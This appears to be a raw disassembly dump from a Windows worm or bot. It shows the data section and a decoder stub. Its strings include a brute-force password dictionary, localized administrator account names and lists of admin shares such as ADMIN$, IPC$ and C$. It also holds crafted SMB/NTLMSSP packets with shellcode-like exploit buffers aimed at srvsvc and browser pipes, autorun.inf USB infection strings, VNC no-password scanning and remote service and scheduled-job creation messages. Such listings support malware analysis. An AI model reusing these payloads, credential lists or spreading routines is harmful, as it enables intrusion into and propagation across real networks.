align 4
aAsp_net db 'ASP.NET',0 ; DATA XREF: .text:0043CCA4�o
aRdp db 'rdp',0 ; DATA XREF: .text:0043CCA0�o
; .text:0043D180�o
aLuna db 'luna',0 ; DATA XREF: .text:0043CC9C�o
align 4
aLiverpool db 'liverpool',0 ; DATA XREF: .text:0043CC98�o
; .text:0043CEA8�o
align 4
aCharlie db 'charlie',0 ; DATA XREF: .text:0043CC94�o
; .text:0043CE90�o ...
aMonkey db 'monkey',0 ; DATA XREF: .text:0043CC90�o
; .text:0043CE8C�o ...
align 4
aArsenal db 'arsenal',0 ; DATA XREF: .text:0043CC8C�o
; .text:0043CE88�o ...
aThomas db 'thomas',0 ; DATA XREF: .text:0043CC88�o
; .text:0043CE84�o ...
align 4
aMaster db 'master',0 ; DATA XREF: .text:0043CC84�o
; .text:0043CEC4�o ...
align 10h
aStandard db 'Standard',0 ; DATA XREF: .text:0043CC80�o
; .text:0043CE74�o
align 4
aHttpd db 'httpd',0 ; DATA XREF: .text:0043CC7C�o
align 4
aApacheServer db 'apache server',0 ; DATA XREF: .text:0043CC78�o
align 4
aRoot db 'root',0 ; DATA XREF: .text:0043CC74�o
; .text:0043D18C�o
align 4
aOwner db 'owner',0 ; DATA XREF: .text:0043CC70�o
; .text:0043CE7C�o ...
align 4
aAdmin1 db 'Admin1',0 ; DATA XREF: .text:0043CC6C�o
; .text:0043CEA0�o
align 4
aAdmin_0 db 'ADMIN',0 ; DATA XREF: .text:0043CC68�o
; .text:0043CE9C�o
align 4
aAdmins db 'admins',0 ; DATA XREF: .text:0043CC64�o
; .text:0043CE98�o
align 4
aAdm db 'adm',0 ; DATA XREF: .text:0043CC60�o
; .text:0043CE94�o
aSystem_0 db 'SYSTEM',0 ; DATA XREF: sub_41E96F+36�o
; .text:0043CC5C�o ...
align 4
aManager db 'manager',0 ; DATA XREF: .text:0043CC58�o
; .text:0043CE68�o
aServeur db 'serveur',0 ; DATA XREF: .text:0043CC54�o
aServidor db 'Servidor',0 ; DATA XREF: .text:0043CC50�o
; .text:0043D1DC�o
align 4
aUtilizador db 'Utilizador',0 ; DATA XREF: .text:0043CC4C�o
; .text:0043CE78�o
align 10h
aServer db 'Server',0 ; DATA XREF: .text:0043CC48�o
; .text:0043D1E4�o
align 4
aDefault_1 db 'default',0 ; DATA XREF: .text:0043CC44�o
; .text:0043D08C�o
aDefault_0 db 'Default',0 ; DATA XREF: .text:0043CC40�o
; .text:0043CE70�o
aXxxxxx db 'xxxxxx',0 ; DATA XREF: .text:0043CC3C�o
; .text:0043CDFC�o ...
align 10h
aContgenerale db 'Contgenerale',0 ; DATA XREF: .text:0043CC38�o
; .text:0043CE6C�o
align 10h
aAmministratore db 'Amministratore',0 ; DATA XREF: .text:0043CC34�o
; .text:0043CE64�o
align 10h
aHallintovirkai db 'Hallintovirkailijat',0 ; DATA XREF: .text:0043CC30�o
aVerwalter db 'Verwalter',0 ; DATA XREF: .text:0043CC2C�o
; .text:0043CE5C�o
align 10h
aRendszergazda db 'Rendszergazda',0 ; DATA XREF: .text:0043CC28�o
; .text:0043CE58�o
align 10h
aBeheerder db 'Beheerder',0 ; DATA XREF: .text:0043CC24�o
; .text:0043CE54�o
align 4
aAdministracion db 'Administracion',0 ; DATA XREF: .text:0043CC20�o
; .text:0043CE50�o
align 4
dword_43DD2C dd 696D6441h, 7473696Eh, 0F6746172h, 72h ; .text:0043CE4C�o
dword_43DD3C dd 0E8ECE4C0h, 0F2F1E8EDh, 0EEF2E0F0h, 0F0h ; .text:0043CE48�o
aAdministrators db 'Administrators',0 ; DATA XREF: .text:0043CC14�o
; .text:0043CE34�o
align 4
aAdministration db 'Administration',0 ; DATA XREF: .text:0043CC10�o
; .text:0043CE30�o
align 4
aAdministratori db 'Administratori',0 ; DATA XREF: .text:0043CC0C�o
; .text:0043CE2C�o
align 4
aAdministratore db 'Administratore',0 ; DATA XREF: .text:0043CC08�o
; .text:0043CE28�o
align 4
aAdministrado_0 db 'Administrador',27h,0 ; DATA XREF: .text:0043CC04�o
; .text:0043CE24�o
align 4
aAdministratoro db 'Administratoro',0 ; DATA XREF: .text:0043CC00�o
; .text:0043CE20�o
align 4
aAdministrada db 'Administrada',0 ; DATA XREF: .text:0043CBFC�o
; .text:0043CE1C�o
align 4
aAdministrateur db 'Administrateur',0 ; DATA XREF: .text:0043CBF8�o
; .text:0043CE18�o
align 4
aAdministrador db 'Administrador',0 ; DATA XREF: .text:0043CBF4�o
; .text:0043CE14�o
align 4
aAdmin db 'Admin',0 ; DATA XREF: .text:0043CBF0�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: .text:0043CBEC�o
; .text:0043CE10�o ...
align 4
aDDDDD db '%d%d%d%d%d',0 ; DATA XREF: sub_4051EF+87�o
align 10h
aSSS_4 db '%s\%s\%s',0 ; DATA XREF: sub_4051EF+3B�o
; sub_40541D+2BD�o
align 4
aServicesactive db 'ServicesActive',0 ; DATA XREF: sub_4051EF+11�o
; sub_421E93+18�o
align 4
aSSSSSSNetsched db '%s %s: -> [%s\%s, %s/%s] (NetSchedJobAdded)',0
; DATA XREF: sub_40541D+4F7�o
aBlank db '(Blank)',0 ; DATA XREF: sub_40541D+453�o
; sub_40541D+49C�o
aSSSSSSCreateds db '%s %s: -> [%s\%s, %s/%s] (CreatedService)',0
; DATA XREF: sub_40541D+422�o
align 4
aDevice0 db 'device0$',0 ; DATA XREF: sub_40541D+244�o
align 4
aBrowser db 'BROWSER$',0 ; DATA XREF: sub_40541D+23D�o
align 4
aDrivec db 'drivec$',0 ; DATA XREF: sub_40541D+236�o
aMssql_0 db 'MSSQL$',0 ; DATA XREF: sub_40541D+22F�o
align 4
aMysql_0 db 'MYSQL$',0 ; DATA XREF: sub_40541D+228�o
align 4
aWinnt_0 db 'WINNT$',0 ; DATA XREF: sub_40541D+221�o
align 4
aWindows_0 db 'WINDOWS$',0 ; DATA XREF: sub_40541D+21A�o
align 10h
aPipe db 'PIPE$',0 ; DATA XREF: sub_40541D+213�o
align 4
aPipe_0 db 'PIPE\',0 ; DATA XREF: sub_40541D+20C�o
align 10h
aAdministrato_1 db 'ADMINISTRATOR$',0 ; DATA XREF: sub_40541D+205�o
align 10h
aAdministrado_1 db 'ADMINISTRADOR$',0 ; DATA XREF: sub_40541D+1FE�o
align 10h
aDDocume1Admi_0 db 'D$\DOCUME~1\ADMINI~1$',0 ; DATA XREF: sub_40541D+1F7�o
align 4
aCDocume1Admi_0 db 'C$\DOCUME~1\ADMINI~1$',0 ; DATA XREF: sub_40541D+1F0�o
align 10h
aDDocume1Admini db 'D$\DOCUME~1\ADMINI~1\',0 ; DATA XREF: sub_40541D+1E9�o
align 4
aCDocume1Admini db 'C$\DOCUME~1\ADMINI~1\',0 ; DATA XREF: sub_40541D+1E2�o
align 10h
aEWindowsSystem db 'E:\WINDOWS\system32$',0 ; DATA XREF: sub_40541D+1DB�o
align 4
aEWinntSystem32 db 'E:\WINNT\system32$',0 ; DATA XREF: sub_40541D+1D4�o
align 4
aDWindowsSystem db 'D:\WINDOWS\system32$',0 ; DATA XREF: sub_40541D+1CD�o
align 4
aDWinntSystem32 db 'D:\WINNT\system32$',0 ; DATA XREF: sub_40541D+1C6�o
align 4
aCWinntSystem32 db 'C:\WINNT\system32$',0 ; DATA XREF: sub_40541D+1BC�o
align 4
aDWindows db 'D:\WINDOWS$',0 ; DATA XREF: sub_40541D+1B5�o
aCWinnt db 'C:\WINNT$',0 ; DATA XREF: sub_40541D+1AE�o
align 4
aZ_1 db 'Z$',0 ; DATA XREF: sub_40541D+1A4�o
align 4
aY_0 db 'Y$',0 ; DATA XREF: sub_40541D+19D�o
align 4
asc_43DFDC db 'X$',0 ; DATA XREF: sub_40541D+196�o
align 10h
aW db 'W$',0 ; DATA XREF: sub_40541D+18F�o
align 4
aV db 'V$',0 ; DATA XREF: sub_40541D+188�o
align 4
aU_0 db 'U$',0 ; DATA XREF: sub_40541D+17E�o
align 4
aT db 'T$',0 ; DATA XREF: sub_40541D+174�o
align 10h
aR db 'R$',0 ; DATA XREF: sub_40541D+16A�o
align 4
aQ_0 db 'Q$',0 ; DATA XREF: sub_40541D+160�o
align 4
aP_3 db 'P$',0 ; DATA XREF: sub_40541D+156�o
align 4
aO db 'O$',0 ; DATA XREF: sub_40541D+14C�o
align 10h
aN_0 db 'N$',0 ; DATA XREF: sub_40541D+142�o
align 4
asc_43E004 db 'L$',0 ; DATA XREF: sub_40541D+12E�o
align 4
aK_0 db 'K$',0 ; DATA XREF: sub_40541D+124�o
align 4
aJ db 'J$',0 ; DATA XREF: sub_40541D+11A�o
align 10h
aI_1 db 'I$',0 ; DATA XREF: sub_40541D+110�o
align 4
asc_43E014 db 'H$',0 ; DATA XREF: sub_40541D+106�o
align 4
aG db 'G$',0 ; DATA XREF: sub_40541D+FC�o
align 4
aF db 'F$',0 ; DATA XREF: sub_40541D+F2�o
align 10h
aE_1 db 'E$',0 ; DATA XREF: sub_40541D+E8�o
align 4
aD db 'D$',0 ; DATA XREF: sub_40541D+DE�o
align 4
aC_0 db 'C$',0 ; DATA XREF: sub_40541D+D4�o
align 4
aB db 'B$',0 ; DATA XREF: sub_40541D+CA�o
align 10h
aNetlogon db 'NETLOGON$',0 ; DATA XREF: sub_40541D+C0�o
align 4
aS_7 db 'S$',0 ; DATA XREF: sub_40541D+B6�o
align 10h
aPrint db 'PRINT$',0 ; DATA XREF: sub_40541D+AC�o
align 4
aIpc db 'IPC$',0 ; DATA XREF: sub_40541D+A2�o
; sub_4097B9+1A8�o
align 10h
aAdmin_2 db 'ADMIN$',0 ; DATA XREF: sub_40541D+98�o
align 4
aCWindowsSystem db 'C:\WINDOWS\system32$',0 ; DATA XREF: sub_40541D+89�o
align 10h
aAdministratorS db 'Administrator\\%s$',0 ; DATA XREF: sub_40541D+6E�o
align 4
aSIpc db '%s\IPC$',0 ; DATA XREF: sub_4059BF+56�o
aS_0 db '\\%s',0 ; DATA XREF: sub_4059BF+15�o
; sub_4097B9+150�o ...
align 8
dword_43E098 dd 0EFFFC481h, 44FFFFh, 43E148hdword_43E0A4 dd 42Ah dword_43E0A8 dd 3E8h dword_43E0AC dd 258h byte_43E0B0 db 0 ; DATA XREF: sub_405C99+1E�r
; sub_405C99+342�r ...
byte_43E0B1 db 1 ; DATA XREF: sub_405C99:loc_405E0A�r
; sub_405C99:loc_405FF9�r ...
align 4
dd offset aWinxp_0 ; "WinXP"
dd 2C6h, 264h, 0
dd 1
dword_43E0C8 dd 20804h ; sub_405C99+448�o ...
dword_43E0CC dd 158h dword_43E0D0 dd 3000005h, 10h ; sub_4066E2+3B7�o
dword_43E0D8 dd 2 dup(0) ; sub_4066E2+38D�o
dword_43E0E0 dd 200h, 1F0000h, 2 dup(0) ; sub_4066E2+3A4�o
dword_43E0F0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43E13C dd 158h ; sub_4066E2:loc_406A31�r
aWinxp_0 db 'WinXP',0 ; DATA XREF: .text:0043E0B4�o
align 4
aWinnt2k db 'WinNT+2K',0
align 4
loc_43E154: ; DATA XREF: sub_405C99+36D�o
; sub_4066E2+487�o
jmp short near ptr dword_43E158
; ---------------------------------------------------------------------------
align 4
dword_43E158 dd 0 dword_43E15C dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; sub_4097B9+293�o
dword_43E170 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0aSPipeSrvsvc db '\\%s\pipe\srvsvc',0 ; DATA XREF: sub_405C99+12A�o
; sub_405C99+1DA�o
align 4
aSPipeTrkwks db '\\%s\pipe\trkwks',0 ; DATA XREF: sub_405C99+8C�o
align 4
aSIpc_0 db '\\%s\IPC$',0 ; DATA XREF: sub_405C99+47�o
; sub_405C99+E5�o ...
align 4
dword_43E1B8 dd 2, 0 ; sub_4066E2+477�o
dword_43E1C0 dd 215h, 0 ; sub_4066E2+428�o
dword_43E1C8 dd 163h, 0 ; sub_4066E2+275�o
dword_43E1D0 dd 1, 0 ; sub_4066E2+3C2�o
aSPipeBrowser db '\\%s\PIPE\BROWSER',0 ; DATA XREF: sub_4066E2+AD�o
align 4
aSPipe db '\\%s\PIPE',0 ; DATA XREF: sub_4066E2+98�o
align 4
aSSSIFileS_ db '%s %s, %s: %i, File: %s.',0 ; DATA XREF: sub_406C69+BF�o
align 4
aSSIpS db '%s (%s) -> IP: (%s)',0 ; DATA XREF: sub_406D7F+1FB�o
; sub_406D7F+22E�o ...
aSSSingleIpSSDO db '%s %s single Ip: (%s) %s: (%d) open.',0 ; DATA XREF: sub_406D7F+DB�o
align 10h
aSSSSStartSD db '%s %s%s: (%s), Start%s: (%d)',0 ; DATA XREF: sub_407281+74�o
align 10h
aB_0 db '',0
dw 4400h
aCkfdenecfdef_2 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedca_1 db ' EKEDFEEIEDCACACACACACACACACACAAA',0
align 10h
dword_43E2C0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_4073A2+BE�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_1 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_1 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_43E350 dd 0B9000000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_4073A2+F7�o
dd 0C0750000h, 6DD70000h, 0FF0Ch, 2FFDF00h, 100h, 5B000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Eh, 0, 60h
db 59h ; Y
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Fh, 30h
db 4Dh ; M
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 3Bh, 4
a9ntlmssp_0 db '9NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 10h, 0, 10h
db 0
db 29h, 2 dup(0)
db 0
aWorkgrouplqp_0 db 'WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195',0
aWindows20005_3 db 'Windows 2000 5.0',0
align 10h
dword_43E410 dd 0D010000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_4073A2+147�o
dd 0C0750000h
dword_43E430 dd 6DD72000h, 0FF0Ch, 2FFDF00h, 100h, 0AF000000h, 0
; DATA XREF: sub_4073A2+134�o
dd 0D05C00h, 0A100D280h, 8130AC81h, 0A681A2A9h, 4EA38104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 20000000h, 82002000h, 0
dd 0A2000000h, 1000000h, 0ED000802h, 778839B7h, 0BE16D7h
dd 3 dup(0)
db 0
db 2 dup(0), 42h
db 0AEh ; ®
db 0B7h, 1Fh, 0BBh
db 6Dh ; m
db 0C1h, 84h, 99h
db 1
aKXEcTijW_0 db 'k',8,'±xºeC',0Ah
db 'ÓšâI†)W',0
dd offset byte_52004F
dd offset byte_47004B
dd offset word_4F0052
dd offset byte_500055
dd offset dword_51006C
db 50h, 0, 78h
db 0
db 66h, 0, 32h
db 0
dd offset byte_530049
dd offset byte_670051
dd offset byte_560045
dd offset byte_620031
dd offset byte_4B0047
align 2
aWindows20002_1 db 'Windows 2000 2195',0
aWindows20005_4 db 'Windows 2000 5.0',0
align 8
dword_43E528 dd 6B000000h, 424D53FFh, 73h, 20011800h, 3 dup(0)
; DATA XREF: sub_4073A2+178�o
dd 0C0750000h, 6DD70000h, 0FF0Dh, 2FFDF00h, 100h, 2 dup(0)
dd 40000000h, 2E000000h, 4F570000h, 52474B52h, 50554Fh
aWindows20002_2 db 'Windows 2000 2195',0
aWindows20005_5 db 'Windows 2000 5.0',0
align 4
dword_43E598 dd 37000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_4073A2+1C5�o
dd 0C0750000h
dword_43E5B8 dd 6DD72001h, 0FF04h, 1000000h, 0C00h, 24435049h, 3F3F3F00h
; DATA XREF: sub_4073A2+1B5�o
dd 3F3Fh, 0
dword_43E5D8 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_4073A2+22F�o
dword_43E5F4 dd 4780800h dword_43E5F8 dd 400800h, 0DE00FF18h, 1000DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 2 dup(0)
dword_43E648 dd 3F020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_4073A2+2AC�o
dword_43E664 dd 4780800h dword_43E668 dd 400800h, 0FF0Eh db 0
byte_43E671 db 0, 40h, 0 ; DATA XREF: sub_4073A2+299�o
dd 0FF000000h, 8FFFFFFh, 20000h, 3F020000h, 0
dd 5020000h, 10030B00h, 0
dd 2, 0D0000000h, 16D016h, 0B000000h, 0
dd 84000100h, 1FB33323h, 2C0E9508h, 0C32C304Ah, 1830708h
dd 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 1000000h, 0BE000100h, 54A71E0Eh, 91E02161h, 23E45A04h
dd 2D082E6h, 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 2000000h, 0E9000100h, 0E77F4FDFh, 0A54D6B2Bh
dd 833CAAD4h, 0A10315h, 4000200h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 3000000h, 0AD000100h, 19D89A50h
dd 1CF35CB9h, 0AD534199h, 175601Eh, 4000000h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 4000000h, 97000100h
dd 409F7E21h, 0D7BEC99Eh, 0F1B0A4EBh, 595FE37h, 4000300h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 5000000h
dd 0FD000100h, 858B52C8h, 8B3A74CCh, 30E02915h, 216ACCDh
dd 4000100h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 6000000h, 5B000100h, 0E19ACBDEh, 1F728325h, 92A2A310h
dd 7636E7h, 4000200h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 7000000h, 74000100h, 9C0CDF4h, 0BEF37F2Dh
dd 0C3573B8h, 1685206h, 4000000h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 8000000h, 0E5000100h, 0E1EA256Ch
dd 4AC21B8Ah, 29885617h, 106C3EEh, 4000200h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 9000000h, 26000100h
dd 4D7D7050h, 7BAF8288h, 0EA1D963Dh, 29A17EBh, 4000100h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 0A000000h
dd 0C8000100h, 704B324Fh, 1201D316h, 0BF475A78h, 388E16Eh
dd 4000000h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 2 dup(0)
dword_43E890 dd 3B000000h, 424D53FFh, 2Eh, 20011800h, 3 dup(0)
; DATA XREF: sub_4073A2+31D�o
dword_43E8AC dd 4780800h dword_43E8B0 dd 400800h, 0FF0Ah db 0
byte_43E8B9 db 0, 40h, 0 ; DATA XREF: sub_4073A2+30D�o
dd 80000000h, 0FFBB80BBh, 0FFFFFFh, 2 dup(0)
dword_43E8D0 dd 0FB020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_4073A2+507�o
dword_43E8EC dd 4780800h dword_43E8F0 dd 400800h, 0FF0Eh db 0
byte_43E8F9 db 0, 40h, 0 ; DATA XREF: sub_4073A2+37E�o
dd 0FF000000h, 8FFFFFFh, 2BC00h, 3F02BC00h, 0
dd 502BC00h, 10030000h, 0BC000000h, 2, 0A4000000h, 0A000002h
dd 79001F00h, 3941FA0h, 0
dd 3000000h, 59000000h, 4C00h, 31000000h, 1, 31000000h
dd 5C000001h, 6E554600h, 76454C4Dh, 6A7A4E64h, 7A58746Eh
dd 6376416Eh, 7644534Fh, 556C5563h, 4A464C4Ch, 4350436Dh
dd 65676A6Dh, 44627058h, 74414943h, 5254446Ah, 79784150h
dd 58744958h, 78446643h, 58526A76h, 79535774h, 63714341h
dd 577A7250h, 55616548h, 6F72664Bh, 75456E68h, 555A7953h
dd 627A507Ah, 42A94365h, 15D53846h, 0A89B2567h, 3F9747B9h
dd 37B92B1h, 56696FCh, 91B68D04h, 0FD30B49Fh, 4A411D2Ch
dd 3448B3B0h, 4E4FF9B8h
db 0F5h
byte_43E9E1 db 31h, 0C9h, 83h ; DATA XREF: sub_4073A2+393�o
dd 0FFE8ADE9h, 0C0FFFFFFh, 0E76815Eh, 9794BB22h, 0E2FCEE83h
dd 0C07FA3F4h, 1544DD65h, 6B44D273h, 7FD1DE68h, 6B42CADAh
dd 1FDBDD68h, 1F9F06FBh, 0E8301ED2h, 7BBA5A92h, 1FA36D1Ch
dd 7FBA02C8h, 1F8FA9DEh, 548ACC96h, 543F8E0Eh, 5E7A25E3h
dd 7F79239Ah, 0B0EF1963h, 1F5E57BFh, 7FBA06C8h, 0DFB7A9F1h
dd 95A77D1Ch, 1F97217Ch, 889F4E1Eh, 4F8AE1F6h, 0A4F8A9F3h
dd 1FB7621Ch, 1F163EE7h, 0FCE52AD7h, 78B56C19h, 0F26DDDC7h
dd 0A7D344C4h, 0E7CC4AA5h, 6BEF7DA5h, 79704A47h, 6BEB196Bh
dd 71327D41h, 9C56A3F1h, 96D17795h, 4DD3F268h, 0C316D79Eh
dd 0C7E8F468h, 0D7E871C4h, 6BE861C4h, 85D34447h, 1DE844CBh
dd 30D3B776h, 0C37C528Dh, 84D1F468h, 444477C6h, 0BA1686FFh
dd 4244757Eh, 77C4h, 1Ah dup(0)
dd 6B000000h, 44447041h, 7475CDFFh, 424471F7h, 94BBF268h
dd 2E005C97h, 5C002E00h, 2E002E00h, 41005C00h, 48004F00h
dd 4D004C00h, 59005800h
db 0
byte_43EB61 db 0DEh, 0ADh, 0BEh ; DATA XREF: sub_4073A2+3A4�o
db 0EFh
byte_43EB65 db 0BAh, 0DEh, 0C0h ; DATA XREF: sub_4073A2+3A9�o
dd 544950DEh
db 48h
byte_43EB6D db 0FEh, 0EDh, 0FAh ; DATA XREF: sub_4073A2+3AE�o
dd 4A4649CEh, 54554F55h, 57555045h, 574D584Bh, 48475558h
dd 4B45494Dh, 4E455943h, 50514142h, 44455A4Ch, 424F4F4Eh
dd 0BA574D47h, 0D5853DB3h, 0EB4AF81Bh, 435A4D62h, 484C5754h
dd 495759h, 9A000000h, 2000001h, 0
dd 2000000h, 5C000000h, 1000000h, 10h, 2 dup(0)
dword_43EBD4 dd 1F1CB0h dword_43EBD8 dd 1F1CB0h dword_43EBDC dd 20408h, 1 dword_43EBE4 dd 1001361h dword_43EBE8 dd 1001361h dword_43EBEC dd 20408h, 2 dword_43EBF4 dd 6F88F727h dword_43EBF8 dd 6F8916E2h dword_43EBFC dd 20408h, 3 dword_43EC04 dd 6F88F807h dword_43EC08 dd 6F8917C2h dword_43EC0C dd 20408h, 4 dword_43EC14 dd 100129Eh dword_43EC18 dd 100129Eh dword_43EC1C dd 20408h, 5 dword_43EC24 dd 71BF21A2h dword_43EC28 dd 71BF21A2h dword_43EC2C dd 20408h, 6 dword_43EC34 dd 71BF3969h dword_43EC38 dd 71BF3969h dword_43EC3C dd 20408h, 7, 5860F727h, 586116E2h, 20408h, 8, 58FBF727h
; DATA XREF: sub_4073A2+4D7�o
dd 58FC16E2h, 20408h
dword_43EC60 dd 158h dword_43EC64 dd 7475615Ch, 6E75726Fh, 666E692Eh, 0aShellOpenDefau db 0Dh,0Ah ; DATA XREF: sub_4079AA+406�o
db 'shell\open\default=1',0
align 10h
aIconSystemroot db 0Dh,0Ah ; DATA XREF: sub_4079AA+3EE�o
db 'icon=%SystemRoot%\system32\SHELL32.dll,4',0Dh,0Ah
db 'action=Open folder to view files',0Dh,0Ah
db 'shell\open=Open',0Dh,0Ah
db 'shell\open\command=',0
align 4
aAutorunOpen db '[autorun]',0Dh,0Ah ; DATA XREF: sub_4079AA+3D5�o
db 'open=',0
align 4
a_shellclassinf db '[.ShellClassInfo]',0Dh,0Ah ; DATA XREF: sub_4079AA+2CD�o
db 'CLSID={645FF040-5081-101B-9F08-00AA002F954E}',0
aDesktop_ini db '\Desktop.ini',0 ; DATA XREF: sub_4079AA+296�o
align 4
aSDDDDDDDDDDDDD db '\S-%d-%d-%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d%d%d%'
; DATA XREF: sub_4079AA+246�o
db 'd%d%d%d%d-%d%d%d%d',0
aRecycler db '\RECYCLER',0 ; DATA XREF: sub_4079AA+74�o
align 4
aSInfectedUsbDr db '%s Infected USB drive: %s',0 ; DATA XREF: sub_407E4B+77�o
align 8
off_43EDE8 dd offset byte_454A54 ; DATA XREF: .text:00409645�r
; .text:00409651�o
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset aLetmein ; "letmein"
dd offset aAdmin_1 ; "admin"
dd offset aAdministrator ; "Administrator"
dd offset a1234567 ; "1234567"
dd offset aPassword ; "password"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset off_43D970
dd offset aPass_1 ; "pass"
dd offset aMaster ; "master"
dd offset aQwerty ; "qwerty"
dd offset a12345678 ; "12345678"
dd offset a654321 ; "654321"
dd offset aAbc123 ; "abc123"
dd offset aThomas ; "thomas"
align 10h
dd 66B5217h
aNxSystemrootSy db '#NX',7,'%systemroot%\system32\cmd.exe',0
align 4
aExit db 'exit',0
align 10h
word_43EE70 dw 1 ; DATA XREF: sub_408029+24�r
; .text:004081B2�r
align 4
word_43EE74 dw 4 ; DATA XREF: sub_408029+10�r
align 4
dword_43EE78 dd 64257325h, 64256425h, 652E6425h, 6578hdword_43EE88 dd 6325h, 0 ; .text:00408ADD�o ...
aSSSSDSSSSSSS_0 db '%s %s %s %s %d >> %s %s %s %s %s >> %s %s %s >> %s %s %s %s >> %s'
; DATA XREF: .text:0040878C�o
; .text:00408AB5�o ...
db ' %s %s >> %s %s%s %s %s %s',0Dh,0Ah,0
align 10h
aSSSSDSSSSSSSSS db '%s %s %s %s %d >> %s %s %s %s %s >> %s %s %s %s >> %s %s %s >> %s'
; DATA XREF: .text:004086FB�o
; .text:00408A13�o ...
db ' %s%s %s %s %s',0Dh,0Ah,0
align 4
aS_5 db '%s',0 ; DATA XREF: .text:00408584�o
; sub_408B99+2C9�o ...
align 4
aVncD_DSNopass db 'VNC%d.%d: %s - (NoPass)',0 ; DATA XREF: .text:00408559�o
; sub_408B99+29E�o
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: .text:004083BB�o
; .text:004083E9�o ...
align 10h
word_43EF70 dw 72h ; DATA XREF: .text:004081DC�r
; sub_408B99+25�r ...
align 4
word_43EF74 dw 63h ; DATA XREF: .text:004081CF�r
; sub_408B99+3E�r ...
align 4
loc_43EF78: ; DATA XREF: .text:004081B9�o
; sub_408B99+2E�o
jmp ebx
; ---------------------------------------------------------------------------
align 4
dword_43EF7C dd 0DFFh ; sub_408B99+1A�o
dword_43EF80 dd 0EBFFh ; sub_408B99+E�o
dword_43EF84 dd 201h dword_43EF88 dd 20424652h, 2E333030h, 0A383030h, 0aVncD_DSS db 'VNC%d.%d: %s - %s',0 ; DATA XREF: sub_408B99+797�o
align 10h
dword_43EFB0 dd 158h dword_43EFB4 dd 0D0EC8166h, 7dword_43EFBC dd 129F74h, 0 dword_43EFC4 dd 127D78h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43EFD0 proc near ; DATA XREF: sub_4097B9+D1�o
; FUNCTION CHUNK AT 0043EFD6 SIZE 00000043 BYTES
pusha
jmp short loc_43EFD6
sub_43EFD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43EFD3 proc near ; CODE XREF: sub_43EFD0:loc_43EFD6�p
pop ebx
push ebx
retn
sub_43EFD3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EFD0
loc_43EFD6: ; CODE XREF: sub_43EFD0+1�j
call sub_43EFD3
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_43EFE3: ; CODE XREF: sub_43EFD0+3C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_43EFE3
popa
loc_43F00F: ; DATA XREF: sub_4097B9+B0�r
add [ebx+31h], al
loc_43F012: ; DATA XREF: sub_4097B9+AA�r
mov ebp, 7FC77h
loc_43F017: ; DATA XREF: sub_4097B9:loc_409AA8�r
